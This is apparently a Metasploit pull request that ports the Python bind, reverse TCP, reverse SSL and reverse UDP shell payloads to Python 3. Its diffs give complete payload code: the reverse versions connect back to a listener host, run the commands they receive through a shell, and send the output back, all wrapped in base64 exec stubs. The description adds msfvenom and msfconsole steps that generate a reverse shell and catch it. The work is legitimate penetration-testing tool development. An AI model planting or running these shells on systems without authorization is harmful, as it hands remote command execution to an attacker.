### PR TITLE
fix #14207, fix python/shell_reverse_tcp on python3

### DIFF
--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -8,6 +8,7 @@ module MetasploitModule
   CachedSize = 381
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -49,8 +50,6 @@ module MetasploitModule
     cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-   # base64
-   cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-   cmd
+    py_create_exec_stub(cmd)
  end
 end

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -5,7 +5,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 381
+  CachedSize = 557
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -14,7 +14,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name' => 'Command Shell, Bind TCP (via python)',
-      'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
+      'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
       'Author' => 'mumbai',
       'License' => MSF_LICENSE,
       'Platform' => 'python',

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -36,9 +36,9 @@ module MetasploitModule
 
   def command_string
     cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
+    dead = Rex::Text.rand_text_alpha(3)
     # Set up the socket
-    cmd << "import socket,os\n"
+    cmd << "import socket,subprocess\n"
     cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
     cmd << "so.listen(1)\n"
@@ -46,8 +46,8 @@ module MetasploitModule
     cmd << "#{dead}=False\n"
     cmd << "while not #{dead}:\n"
     cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
+    cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
     py_create_exec_stub(cmd)

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -14,7 +14,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name' => 'Command Shell, Bind TCP (via python)',
-      'Description' => 'Creates an interactive shell via python, encodes with base64 by design',
+      'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
       'Author' => 'mumbai',
       'License' => MSF_LICENSE,
       'Platform' => 'python',

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -5,7 +5,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 557
+  CachedSize = 481
 
   include Msf::Payload::Single
   include Msf::Payload::Python
@@ -35,21 +35,21 @@ module MetasploitModule
   end
 
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(3)
-    # Set up the socket
-    cmd << "import socket as s\n"
-    cmd << "import subprocess as r\n"
-    cmd << "so=s.socket(s.AF_INET,s.SOCK_STREAM)\n"
-    cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
-    cmd << "so.listen(1)\n"
-    cmd << "so,addr=so.accept()\n"
-    cmd << "#{dead}=False\n"
-    cmd << "while not #{dead}:\n"
-    cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tp=r.Popen(data, shell=True, stdin=r.PIPE, stdout=r.PIPE, stderr=r.PIPE)\n"
-    cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
-    cmd << "\tso.send(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      so=s.socket(s.AF_INET,s.SOCK_STREAM)
+      so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))
+      so.listen(1)
+      so,addr=so.accept()
+      while True:
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.send(o)
+    PYTHON
 
     py_create_exec_stub(cmd)
  end

--- a/modules/payloads/singles/python/shell_bind_tcp.rb
+++ b/modules/payloads/singles/python/shell_bind_tcp.rb
@@ -38,15 +38,16 @@ module MetasploitModule
     cmd = ''
     dead = Rex::Text.rand_text_alpha(3)
     # Set up the socket
-    cmd << "import socket,subprocess\n"
-    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+    cmd << "import socket as s\n"
+    cmd << "import subprocess as r\n"
+    cmd << "so=s.socket(s.AF_INET,s.SOCK_STREAM)\n"
     cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
     cmd << "so.listen(1)\n"
     cmd << "so,addr=so.accept()\n"
     cmd << "#{dead}=False\n"
     cmd << "while not #{dead}:\n"
     cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
+    cmd << "\tp=r.Popen(data, shell=True, stdin=r.PIPE, stdout=r.PIPE, stderr=r.PIPE)\n"
     cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 401
+  CachedSize = 573
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -18,7 +18,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP (via python)',
-      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
+      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
       'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -18,7 +18,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP (via python)',
-      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+',
+      'Description'   => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
       'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 621
+  CachedSize = 509
 
   include Msf::Payload::Single
   include Msf::Payload::Python
@@ -45,21 +45,21 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
-    cmd += "import socket,subprocess,os,ssl\n"
-    cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
-    cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
-    # The actual IO
-    cmd += "#{dead}=False\n"
-    cmd += "while not #{dead}:\n"
-    cmd += "\tdata=s.recv(1024)\n"
-    cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
-    cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
-    cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
-    cmd += "\ts.sendall(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      import ssl
+      so=s.socket(s.AF_INET,s.SOCK_STREAM)
+      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      so=ssl.wrap_socket(so)
+      while True:
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.sendall(o)
+    PYTHON
 
     py_create_exec_stub(cmd)
   end

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -18,7 +18,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
-      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+',
+      'Description'   => 'Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
       'License'       => BSD_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -18,7 +18,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
-      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+',
       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
       'License'       => BSD_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -12,6 +12,7 @@ module MetasploitModule
   CachedSize = 561
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -60,10 +61,7 @@ module MetasploitModule
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.sendall(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
   end
 end
 

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 561
+  CachedSize = 621
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 461
+  CachedSize = 453
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -18,7 +18,7 @@ module MetasploitModule
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse UDP (via python)',
-      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
+      'Description'   => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -46,7 +46,7 @@ module MetasploitModule
   #
   def command_string
     cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
+    dead = Rex::Text.rand_text_alpha(3)
     # Set up the socket
     cmd << "import socket,subprocess\n"
     cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 573
+  CachedSize = 461
 
   include Msf::Payload::Single
   include Msf::Payload::Python
@@ -45,20 +45,19 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(3)
-    # Set up the socket
-    cmd << "import socket,subprocess\n"
-    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"
-    cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
-    # The actual IO
-    cmd << "#{dead}=False\n"
-    cmd << "while not #{dead}:\n"
-    cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
-    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
-    cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
-    cmd << "\tso.send(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      so=s.socket(s.AF_INET,s.SOCK_DGRAM)
+      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      while True:
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.send(o)
+    PYTHON
 
     py_create_exec_stub(cmd)
   end

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -49,14 +49,14 @@ module MetasploitModule
       import socket as s
       import subprocess as r
       so=s.socket(s.AF_INET,s.SOCK_DGRAM)
-      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      o=b''
       while True:
+      	so.sendto(o,('#{datastore['LHOST']}',#{datastore['LPORT']}))
       	d=so.recv(1024)
       	if len(d)==0:
       		break
       	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
       	o=p.stdout.read()+p.stderr.read()
-      	so.send(o)
     PYTHON
 
     py_create_exec_stub(cmd)

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 397
+  CachedSize = 573
 
   include Msf::Payload::Single
   include Msf::Payload::Python

--- a/modules/payloads/singles/python/shell_reverse_udp.rb
+++ b/modules/payloads/singles/python/shell_reverse_udp.rb
@@ -12,6 +12,7 @@ module MetasploitModule
   CachedSize = 397
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -47,7 +48,7 @@ module MetasploitModule
     cmd = ''
     dead = Rex::Text.rand_text_alpha(2)
     # Set up the socket
-    cmd << "import socket,os\n"
+    cmd << "import socket,subprocess\n"
     cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"
     cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
     # The actual IO
@@ -55,14 +56,11 @@ module MetasploitModule
     cmd << "while not #{dead}:\n"
     cmd << "\tdata=so.recv(1024)\n"
     cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tp=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
+    cmd << "\tstdout_value=p.stdout.read()+p.stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
   end
 
 end

--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -538,6 +538,7 @@ class Msftidy
     no_stdio   = true
     in_comment = false
     in_literal = false
+    in_heredoc = false
     src_ended  = false
     idx        = 0
 
@@ -556,6 +557,15 @@ class Msftidy
       in_literal = false if ln =~ /^EOS$/
       next if in_literal
       in_literal = true if ln =~ /\<\<-EOS$/
+
+      # heredoc string awareness (ignore indentation in these)
+      if in_heredoc
+        in_heredoc = false if ln =~ /\s#{in_heredoc}$/
+        next
+      end
+      if ln =~ /\<\<\~([A-Z]+)$/
+        in_heredoc = $1
+      end
 
       # ignore stuff after an __END__ line
       src_ended = true if ln =~ /^__END__$/


### PR DESCRIPTION
Fix #14207 
It seems like the python/shell_reverse_tcp doesn't work with python3 (Python 3.8.5)

## Verification

List the steps needed to make sure this thing works

- [ ] Run a handler: `./msfconsole -qx "use exploit/multi/handler; set payload python/shell_reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run"`
- [ ] Run `./msfvenom -p python/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o out.py && python3 out.py`
- [ ] **Verify** you get a session

Marking this is a draft because I still need to test python2 and ensure the 'exit' command still exits the shell.
